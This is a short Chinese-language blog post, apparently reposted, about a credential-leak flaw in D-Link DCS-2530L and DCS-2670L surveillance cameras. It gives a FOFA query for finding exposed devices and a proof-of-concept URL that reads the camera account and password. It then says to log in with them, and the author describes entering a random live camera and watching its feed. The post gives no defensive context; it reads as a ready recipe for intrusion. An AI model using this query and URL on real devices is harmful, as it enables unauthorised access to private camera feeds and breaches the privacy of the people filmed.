D-Link DCS-2530L和DCS-2670L存在監控信息泄露漏洞,此漏洞利用如此簡單,危害如此之大,不禁讓人驚嘆恐怖如斯。
fofa搜索: app="D_LINK_DCS_2530L"
隨便進入一個,是登錄界面,需要登錄口令:
POC如下:
http://xx.xx.xx.xx/config/getuser?index=0
直接可以讀取到監控頁面的賬戶密碼
接下來回到剛才的登陸界面正常輸入口令即可進入
看了幾秒就不敢看了,這玩意太可怕了。。
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
猜您在找
D-Link DCS系列監控 賬號密碼信息泄露漏洞 CVE-2020-25078
IOT入門---------第一個cve復現(CVE-2020-24581 D-Link DSL-2888A 遠程命令執行漏洞分析)
漏洞復現-CVE-2017-7529-敏感信息泄露
(CVE-2019-8449)Atlassian Jira 信息泄露漏洞復現
D-Link系列路由器漏洞挖掘入門
CVE-2020-1938與CVE-2020-13935漏洞復現
CVE-2020-0796漏洞復現(RCE)
CVE-2020-0796漏洞復現
CVE-2020-1938 漏洞復現
CVE-2020-1472漏洞復現